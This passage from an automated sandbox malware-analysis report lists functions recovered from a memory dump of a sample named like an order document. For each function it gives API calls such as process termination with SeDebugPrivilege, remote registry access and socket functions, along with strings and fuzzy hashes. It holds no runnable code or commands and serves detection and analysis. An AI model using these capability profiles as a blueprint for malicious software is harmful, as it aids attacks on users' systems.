Part of subcall function 00446EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00445FA6,?), ref: 00446EF1

Part of subcall function 004472CB: GetFileAttributesW.KERNEL32(?,00446019), ref: 004472CC

lstrcmpiW.KERNEL32(?,?), ref: 004475CA
_wcscmp.LIBCMT ref: 004475E2
MoveFileW.KERNEL32(?,?), ref: 004475FB

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: d4c9a3347340ec2f6b292e15ccfd5db41bd16ad9e0c1aa6c8d3ee4a06672525c
Instruction ID: 4fd7047bc00f5dce267b69f2963a5cde5898196708b614909851b39d2912f40e
Opcode Fuzzy Hash: d4c9a3347340ec2f6b292e15ccfd5db41bd16ad9e0c1aa6c8d3ee4a06672525c
Instruction Fuzzy Hash: 875153B2A092295BEF54EB55D8419DE73BCAF08314B4040EFF605E3141DB7897C5CB68

Function 0041EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0047DAD1,00000004,00000000,00000000), ref: 0041EAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0047DAD1,00000004,00000000,00000000), ref: 0041EB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0047DAD1,00000004,00000000,00000000), ref: 0047DC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0047DAD1,00000004,00000000,00000000), ref: 0047DCF2

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: e35abcf98b5afbda80e3227c5b88a53d0a40ca8882ce08670dafe92d1e5b9445
Instruction ID: a205110f149b1f1218910d7447822024f539e8ea0fa6c020a507fcb349153875
Opcode Fuzzy Hash: e35abcf98b5afbda80e3227c5b88a53d0a40ca8882ce08670dafe92d1e5b9445
Instruction Fuzzy Hash: 3041E738A1D2409ED735D72A898DAEB7BA5AF41304F19481FE84B426A1D67C78C1D31E

Function 0043B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0043AEF1,00000B00,?,?), ref: 0043B26C
HeapAlloc.KERNEL32(00000000,?,0043AEF1,00000B00,?,?), ref: 0043B273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0043AEF1,00000B00,?,?), ref: 0043B288
GetCurrentProcess.KERNEL32(?,00000000,?,0043AEF1,00000B00,?,?), ref: 0043B290
DuplicateHandle.KERNEL32(00000000,?,0043AEF1,00000B00,?,?), ref: 0043B293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0043AEF1,00000B00,?,?), ref: 0043B2A3
GetCurrentProcess.KERNEL32(0043AEF1,00000000,?,0043AEF1,00000B00,?,?), ref: 0043B2AB
DuplicateHandle.KERNEL32(00000000,?,0043AEF1,00000B00,?,?), ref: 0043B2AE
CreateThread.KERNEL32(00000000,00000000,0043B2D4,00000000,00000000,00000000), ref: 0043B2C8

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: b09332795f41ada4f02e568152242dc9f8119ecf0a51e018e84ae856f03226e9
Instruction ID: 649c36ebd82fd2d6613cd65ed5493ae8568e909360800d4a56ebfdffb0ad5fa3
Opcode Fuzzy Hash: b09332795f41ada4f02e568152242dc9f8119ecf0a51e018e84ae856f03226e9
Instruction Fuzzy Hash: 6101BBB5641304BFE710ABA5EC4DF6B7BACEB88711F018825FA05DB1E1CA749C00CB65

Function 0045C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 0045C49E
NULL Pointer assignment, xrefs: 0045C876, 0045C887

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: e315d8b9a7ed296eecbc4226fe30bc1a590a1587bd0666714106e32b319d473d
Instruction ID: 8ae32c326f13b34f968a3fd0732ad79f87ca9b0915bfb685f72443b58ed8f10e
Opcode Fuzzy Hash: e315d8b9a7ed296eecbc4226fe30bc1a590a1587bd0666714106e32b319d473d
Instruction Fuzzy Hash: 4CE1B471A0031AAFDF14DFA4C8C1AAE77B5EB48355F14402EED05A7382D778AD49CB98

Function 004516DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

Part of subcall function 0041C6F4: _wcscpy.LIBCMT ref: 0041C717

_wcstok.LIBCMT ref: 0045184E
_wcscpy.LIBCMT ref: 004518DD
_memset.LIBCMT ref: 00451910

Strings

p2Kl2K, xrefs: 00451920
X, xrefs: 00451948

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X$p2Kl2K
API String ID: 774024439-158789027
Opcode ID: f42f1562b16398fe9e25e1ce0f0515651a4088d02624d537944d6aa577f343f7
Instruction ID: 5d701206c7572f194744bddddaa9641398cd276a84611de6d7f8691adec13a80
Opcode Fuzzy Hash: f42f1562b16398fe9e25e1ce0f0515651a4088d02624d537944d6aa577f343f7
Instruction Fuzzy Hash: BCC172715043409FC724EF65C981A5BB7E4BF85354F04496EF8899B2A2DB38ED09CB8A

Function 00469A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00469B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 00469B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00469B47
_wcscat.LIBCMT ref: 00469BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 00469BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00469BE7

Strings

SysListView32, xrefs: 00469AEB

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 585fa35d72b960bde6c0ee2fd26a5f07f0d3d71ce429430298f8f4a0276a5859
Instruction ID: 6e331419d66a5e7ffc9b920dd3de1b6671d1a98f102795e492cf5c4c2e55d44c
Opcode Fuzzy Hash: 585fa35d72b960bde6c0ee2fd26a5f07f0d3d71ce429430298f8f4a0276a5859
Instruction Fuzzy Hash: BB41C270A00308ABDB219FA4DC85FEE77E8EF08754F10042BF545A7291D3B99D84CB68

Function 0046172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 00446532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00446554
Part of subcall function 00446532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00446564
Part of subcall function 00446532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 004465F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046179A
GetLastError.KERNEL32 ref: 004617AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004617D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 00461855
GetLastError.KERNEL32(00000000), ref: 00461860
CloseHandle.KERNEL32(00000000), ref: 00461895

Strings

SeDebugPrivilege, xrefs: 004617B8

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 270c03403a1bab446a1558f45870165f337d3cd8e2a64d14bab469aaa4e9bc0a
Instruction ID: d2d618a15ae8a2f00e8176200d48da833dd737e9018933eaf1cf8cd54ec3b0d0
Opcode Fuzzy Hash: 270c03403a1bab446a1558f45870165f337d3cd8e2a64d14bab469aaa4e9bc0a
Instruction Fuzzy Hash: 3C41E231600200AFDB05EF55C8D6FAE77A5AF54304F08846EF9069F3D2EB7C99008B9A

Function 00445819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 004458B8

Strings

stop, xrefs: 00445889
warning, xrefs: 004458A1
info, xrefs: 00445859
blank, xrefs: 0044583A
question, xrefs: 00445871

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 5bfb3e2f318e15bc9736881087da9f68b7bd6f9ed755ebbf19411a783dae3153
Instruction ID: c7aeb5d251757967eccb0ff0c75affac7e8e2f1af9d52ff6fef3c92f1c8c2872
Opcode Fuzzy Hash: 5bfb3e2f318e15bc9736881087da9f68b7bd6f9ed755ebbf19411a783dae3153
Instruction Fuzzy Hash: 7A11D831749756BBBF116A55AC92DAB33DC9F25314B20003BF500A6283EBACAA11426D

Function 0044A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0044A806

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 7a8f8a471411fe2fa06817c37687fc143dfbfe5ddb5f0facf6f6bd21be5f378c
Instruction ID: ed324042c9a2b2701b04785601773068e8da0337221a3b70339ad8aef4324f64
Opcode Fuzzy Hash: 7a8f8a471411fe2fa06817c37687fc143dfbfe5ddb5f0facf6f6bd21be5f378c
Instruction Fuzzy Hash: 63C19F75A4121ADFEB00DF94C481BAEB7F4FF08314F24446AE605E7381D738A956CB9A

Function 00446B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00446B63
LoadStringW.USER32(00000000), ref: 00446B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00446B80
LoadStringW.USER32(00000000), ref: 00446B87
_wprintf.LIBCMT ref: 00446BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00446BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00446BA8

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 584890564f3e5e306f944e4d1379c1c94349139ecdd1e8586c36002fd5fee6da
Instruction ID: 869915b13ef1c9269c9a5a225239d8a80d17e3bad1684c58eb68944aaf863664
Opcode Fuzzy Hash: 584890564f3e5e306f944e4d1379c1c94349139ecdd1e8586c36002fd5fee6da
Instruction Fuzzy Hash: D6018BF2D002187FEB11A790DD89EFB376CD704304F0048A6B745D2041EA749E844F79

Function 00462B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00463C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00462BB5,?,?), ref: 00463C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00462BF6

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: 430283a204355eb489163f8a6ad4293fdf37f88e05129d906ef5df35436a3cc6
Instruction ID: 1436c638f4f59939a06b47cea4d9ff7190834685fc5c7c5e6771a34debbfa418
Opcode Fuzzy Hash: 430283a204355eb489163f8a6ad4293fdf37f88e05129d906ef5df35436a3cc6
Instruction Fuzzy Hash: F8919E71604201AFC700EF55C991B6EB7E5FF88318F04882EF99697291EB78E945CF4A

Function 0045961C Relevance: 12.2, APIs: 8, Instructions: 220networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 00459691
WSAGetLastError.WSOCK32(00000000), ref: 0045969E
__WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 004596C8
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 004596E9
WSAGetLastError.WSOCK32(00000000), ref: 004596F8
inet_ntoa.WSOCK32(?), ref: 00459765
htons.WSOCK32(?,?,?,00000000,?), ref: 004597AA

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ErrorLast$htonsinet_ntoaselect
String ID:
API String ID: 500251541-0
Opcode ID: 53fca022ea2d14d67ef67b7d0b24ca0273834dd059cdd7cbe07acbdb7bf4789e
Instruction ID: 03333625946aaac69fac2bd73161d1cd75afafec04d25dacc2d8625966a9cec0
Opcode Fuzzy Hash: 53fca022ea2d14d67ef67b7d0b24ca0273834dd059cdd7cbe07acbdb7bf4789e
Instruction Fuzzy Hash: 9F71B071504200ABD314EF65CC85E6FB7A8EB84718F104A2EF955A72D2DB38ED09CB5A

Function 0042A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 0042A991

Part of subcall function 00427D7C: __FF_MSGBANNER.LIBCMT ref: 00427D91
Part of subcall function 00427D7C: __NMSG_WRITE.LIBCMT ref: 00427D98
Part of subcall function 00427D7C: __malloc_crt.LIBCMT ref: 00427DB8

__lock.LIBCMT ref: 0042A9A4
__lock.LIBCMT ref: 0042A9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,004B6DE0,00000018,00435E7B,?,00000000,00000109), ref: 0042AA0C
EnterCriticalSection.KERNEL32(8000000C,004B6DE0,00000018,00435E7B,?,00000000,00000109), ref: 0042AA29
LeaveCriticalSection.KERNEL32(8000000C), ref: 0042AA39

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: 273149951996a536410480ec6ac0cd69ebb8ff04d6d08eba4afe8032a158651a
Instruction ID: 095ad9ea3ee5b9dc8ee4f7743ff6f5f47cd94fe39c9175350a546944aea4445a
Opcode Fuzzy Hash: 273149951996a536410480ec6ac0cd69ebb8ff04d6d08eba4afe8032a158651a
Instruction Fuzzy Hash: 08412CB1B002219BEB10DF69EA4475DB7B06F01335F50422FE825AB2D1D7BC9861CB9E

Function 00468ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00468EE4
GetDC.USER32(00000000), ref: 00468EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00468EF7
ReleaseDC.USER32(00000000,00000000), ref: 00468F03
CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00468F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00468F50
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00468F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00468FAA

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: ea5d588be0f4a5aa506cac1e59643bea3d710048f6ec8508ff6dc93a0a3fb125
Instruction ID: 611ed22d8254807c85b721b2519c9d3a91f4afa22137adc93f8eb9d36c6173eb
Opcode Fuzzy Hash: ea5d588be0f4a5aa506cac1e59643bea3d710048f6ec8508ff6dc93a0a3fb125
Instruction Fuzzy Hash: CD318D72601214BFEB148F50CC49FEB3BAAEF49715F044169FE09EA291D6B99841CB78

Function 0045B644 Relevance: 10.9, APIs: 7, Instructions: 399COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0049DC00), ref: 0045B715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0049DC00), ref: 0045B749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0045B8C1
SysFreeString.OLEAUT32(?), ref: 0045B8EB

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

